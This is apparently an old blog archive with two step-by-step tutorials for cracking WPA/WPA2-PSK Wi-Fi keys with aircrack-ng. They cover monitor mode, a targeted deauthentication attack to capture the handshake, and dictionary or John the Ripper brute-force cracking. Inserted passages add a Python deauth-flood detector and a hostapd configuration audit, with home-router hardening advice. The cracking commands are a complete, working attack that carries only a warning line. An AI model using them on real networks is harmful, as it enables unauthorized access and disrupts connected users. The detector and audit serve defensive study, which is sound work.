Friday, April 16, 2010

HOWTO : Crack WPA/WPA2-PSK with dictionary

At the moment, WPA/WPA2-PSK can only be attacked with a dictionary, so cracking it requires that the key you want to recover is already in your wordlist.

The following tutorial is based on Back|Track 4.

Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure a client is connected to the wifi router while you perform Steps 1 to 4.

Step 1 :
apt-get install wpa-wordlist

Step 2 :
airmon-ng start wlan0

Step 3 :
airodump-ng mon0

Step 4 :
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

Step 5 :
aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0

If airodump-ng reports that it captured the WPA handshake, go to the next step. If not, repeat this step until you get the handshake.

Step 6 :
aircrack-ng output-01.cap -w /pentest/password/wordlist/wpa.txt

Good luck!

WARNING : Do NOT crack any wifi router without authorization, or you may be put in jail.

That's all. See you!

HOWTO : Crack WPA/WPA2-PSK with John the Ripper

At the moment, WPA/WPA2-PSK can only be attacked with a dictionary, so cracking it requires that the key you want to recover is already in your wordlist.

I have a better solution to crack WPA/WPA2-PSK (in theory, it must succeed), but it requires hours to years to crack, depending on the strength of the key and the speed of the hardware. The following tutorial is based on Back|Track 4.

Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure a client is connected to the wifi router while you perform Steps 1 to 4.

Step 1 :
airmon-ng start wlan0

Step 2 :
airodump-ng mon0

Step 3 :
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

Step 4 :
aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0

If airodump-ng reports that it captured the WPA handshake, go to the next step. If not, repeat this step until you get the handshake.

Step 5 :
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:24:B2:A0:51:14 -w - output*.cap

You will have to wait hours or even years for the cracking to finish, depending on how powerful your hardware is and how strong the key is. CUDA makes the work easier, but it may still take years; it just depends.
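Both tutorials above rely on the same trick in Step 4 (Step 5 in the dictionary version): aireplay-ng spoofs deauthentication frames so that the client reconnects and the 4-way handshake can be captured. From the defender's side that burst of deauth frames is the one loud signal in the whole procedure. The following is an added example, not code from the original post or from the aircrack-ng project: a small Python detector that parses the 802.11 MAC header of captured management frames and flags any transmitter sending an unusual number of deauthentication or disassociation frames in a short window. It assumes frames with no radiotap header (a real capture from airodump-ng or tcpdump carries one that must be stripped first), and the sample frames, the five-frame threshold and the two-second window are all constructed for illustration, using the BSSID and client MAC from the post.

```python
"""Spot deauthentication floods in captured 802.11 management frames.

Added example (not from the original post). Parses only the 802.11 MAC
header; a real capture carries a radiotap header that must be stripped
first (not handled here). Sample frames are constructed below.
"""
import struct
from collections import defaultdict

# Management frame subtypes (IEEE 802.11 frame type 0)
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
MGMT_HEADER_LEN = 24   # FC(2) + duration(2) + addr1..addr3(18) + seq(2)
REASON_LEN = 2         # deauth/disassoc body starts with a 16-bit reason code


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def parse_kick(frame: bytes):
    """Return (kind, receiver, transmitter, bssid, reason) for a deauth or
    disassoc frame, or None for anything else (beacons, data, ...)."""
    if len(frame) < MGMT_HEADER_LEN + REASON_LEN:
        return None
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, fc0 >> 4
    if version != 0 or ftype != 0 or subtype not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        return None
    addr1, addr2, addr3 = (mac_str(frame[o:o + 6]) for o in (4, 10, 16))
    (reason,) = struct.unpack_from("<H", frame, MGMT_HEADER_LEN)
    kind = "deauth" if subtype == SUBTYPE_DEAUTH else "disassoc"
    return kind, addr1, addr2, addr3, reason


def find_floods(frames, threshold=5, window=2.0):
    """frames: iterable of (timestamp_seconds, raw_frame). Returns
    {transmitter MAC: peak count} for every transmitter that sent at least
    `threshold` deauth/disassoc frames inside some `window`-second span."""
    times_by_src = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_kick(raw)
        if parsed:
            times_by_src[parsed[2]].append(ts)   # key on the transmitter (addr2)
    flagged = {}
    for src, times in times_by_src.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):        # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[src] = max(flagged.get(src, 0), count)
    return flagged


# --- constructed sample capture (test data only, never transmitted) --------
AP = "00:24:B2:A0:51:14"      # BSSID from the post
CLIENT = "00:14:17:94:90:0D"  # client MAC from the post


def build_mgmt(subtype, receiver, transmitter, bssid, body: bytes) -> bytes:
    """Minimal 802.11 management frame header, used only to build sample data."""
    fc = bytes([subtype << 4, 0x00])
    return (fc + b"\x00\x00" + mac_bytes(receiver) + mac_bytes(transmitter)
            + mac_bytes(bssid) + b"\x00\x00" + body)


SAMPLE_FRAMES = (
    # a beacon every 100 ms: ignored by the detector
    [(i * 0.1, build_mgmt(8, "FF:FF:FF:FF:FF:FF", AP, AP, b"\x00" * 12)) for i in range(10)]
    # a burst of ten deauths "from" the AP to the client, reason 7, 100 ms apart
    + [(i * 0.1, build_mgmt(SUBTYPE_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7))) for i in range(10)]
    # one genuine disassociation sent by the client when it leaves the network
    + [(5.0, build_mgmt(SUBTYPE_DISASSOC, AP, CLIENT, AP, struct.pack("<H", 8)))]
)

if __name__ == "__main__":
    for src, peak in find_floods(SAMPLE_FRAMES).items():
        print(f"possible deauth flood from {src}: {peak} kick frames within 2 s")
```

On the sample data only the spoofed burst is reported; the single disassociation the client sends itself stays below the threshold. A real deployment would feed frames from a monitor-mode interface and would also want to watch for a sudden drop in the number of associated stations, since that is what the attack produces.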

WARNING : Do NOT crack any wifi router without authorization, or you will be put in jail.

That's all. See you!

Tuesday, April 06, 2010

Wifi is not 100% safe

There are several protections for wifi: WEP, WPA and WPA2. WEP can be cracked easily. WPA and WPA2 are no longer safe either, no matter whether you use AES or TKIP encryption for your PSK. However, the cracker needs at least one client connected to the wifi router, and your WPA/WPA2 key must be in the cracker's dictionary (password list), before WPA/WPA2-PSK can be cracked.

Recommendation

(1) at least use WPA2-Personal with AES encryption for the key (most likely for home users), or use a Captive Portal if available;
(2) keep your WPA/WPA2 key as long (the maximum is 63 characters) and as complicated as possible; it should include capital and small letters, symbols and numbers (however, some devices may not accept a key of that length);
(3) enable the MAC address filter (if possible, but it is not very useful for higher security);
(4) do not use the factory's WPS feature (or similar, e.g. QSS), as it is quite dangerous for users but convenient for crackers;
(5) change your WPA/WPA2 key often; and
(6) use WPA2-Enterprise if possible (it is the highest security so far).
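Most of these recommendations map onto a handful of settings in an access point's configuration. As an added example, not code from the original post or from the hostapd project, here is a small Python audit that reads a hostapd.conf and reports where it departs from the list above. It uses the real hostapd.conf keys wpa, wpa_key_mgmt, wpa_pairwise, rsn_pairwise, wpa_passphrase, wps_state and ignore_broadcast_ssid; the weak and hardened configurations, the tiny COMMON_WORDS set (a stand-in for a real wordlist such as the wpa-wordlist package installed in the first tutorial) and the 20-character minimum are all constructed for illustration.

```python
"""Audit a hostapd.conf against the recommendations in this post.

Added example, not from the original post or from hostapd. The two
configurations, COMMON_WORDS and MIN_RECOMMENDED_LEN are constructed
for illustration; the configuration keys are hostapd's own.
"""
import string

WEAK_CONF = """\
interface=wlan0
ssid=HomeWifi
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase=password123
wps_state=2
ignore_broadcast_ssid=1
"""

# 63 characters, all four character classes, generated at random for this example
HARDENED_PASSPHRASE = "N7q!Lm2-Wz9$Rt4%Yb6&Hp8*Vk3(Jd5)Xs1+Cf0_Ge7?Ma2/Qw9^Ui4~Zo3Bv5@"

HARDENED_CONF = f"""\
interface=wlan0
ssid=HomeWifi
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase={HARDENED_PASSPHRASE}
wps_state=0
"""

COMMON_WORDS = {"password", "password123", "12345678", "qwertyuiop", "letmein1"}
MIN_RECOMMENDED_LEN = 20   # example threshold; the post says "as long as possible", up to 63


def parse_conf(text: str) -> dict:
    """key=value lines; lines starting with '#' are comments (hostapd's own syntax)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf


def passphrase_findings(pw: str) -> list:
    """Recommendation (2): long, and mixing capitals, small letters, symbols and numbers."""
    msgs = []
    if not 8 <= len(pw) <= 63:
        msgs.append(f"passphrase length {len(pw)}: WPA-PSK passphrases are 8 to 63 ASCII characters")
    elif len(pw) < MIN_RECOMMENDED_LEN:
        msgs.append(f"passphrase is only {len(pw)} characters; use as many of the 63 as your devices accept")
    classes = {
        "lowercase": any(c.islower() for c in pw),
        "uppercase": any(c.isupper() for c in pw),
        "digits": any(c.isdigit() for c in pw),
        "symbols": any(c in string.punctuation for c in pw),
    }
    missing = [name for name, present in classes.items() if not present]
    if missing:
        msgs.append("passphrase lacks " + ", ".join(missing))
    if pw.lower() in COMMON_WORDS:
        msgs.append("passphrase appears in a common wordlist; a dictionary attack will find it")
    return msgs


def audit(conf: dict) -> list:
    """Return (severity, message) findings; 'high' means the post's advice is not followed."""
    out = []
    wpa = conf.get("wpa", "0")
    if wpa == "0":
        out.append(("high", "wpa=0: no WPA at all (open or WEP); set wpa=2"))
    elif wpa != "2":
        out.append(("high", f"wpa={wpa}: WPA1 is still accepted; set wpa=2 for WPA2 only"))
    # hostapd falls back to wpa_pairwise for WPA2 when rsn_pairwise is not given
    pairwise = conf.get("rsn_pairwise") or conf.get("wpa_pairwise", "")
    if "TKIP" in pairwise or "CCMP" not in pairwise:
        out.append(("high", f"pairwise cipher '{pairwise}': use rsn_pairwise=CCMP (AES) only"))
    if conf.get("wps_state", "0") != "0":
        out.append(("high", "WPS is enabled; set wps_state=0 (recommendation 4)"))
    out += [("high", m) for m in passphrase_findings(conf.get("wpa_passphrase", ""))]
    if "WPA-EAP" not in conf.get("wpa_key_mgmt", ""):
        out.append(("info", "PSK in use; WPA2-Enterprise (wpa_key_mgmt=WPA-EAP with ieee8021x=1) is stronger if a RADIUS server is available"))
    if conf.get("ignore_broadcast_ssid", "0") != "0":
        out.append(("info", "hidden SSID adds no security; the name still appears in probe and association frames"))
    return out


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for severity, msg in audit(parse_conf(text)):
            print(f"  [{severity}] {msg}")
```

Run against the weak configuration the audit reports WPA1 still accepted, TKIP, WPS enabled and a short, single-case dictionary passphrase; the hardened one only gets the informational note that WPA2-Enterprise would be stronger still, which is recommendation (6). Recommendation (5), rotating the key, is a process rather than a setting and is not something a config audit can check.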

Keep in mind that these settings may not work tomorrow. The world is changing very fast.

By the way, a hidden BSSID and the MAC address filter are useless, as crackers can obtain such information very easily.

That's all! See you.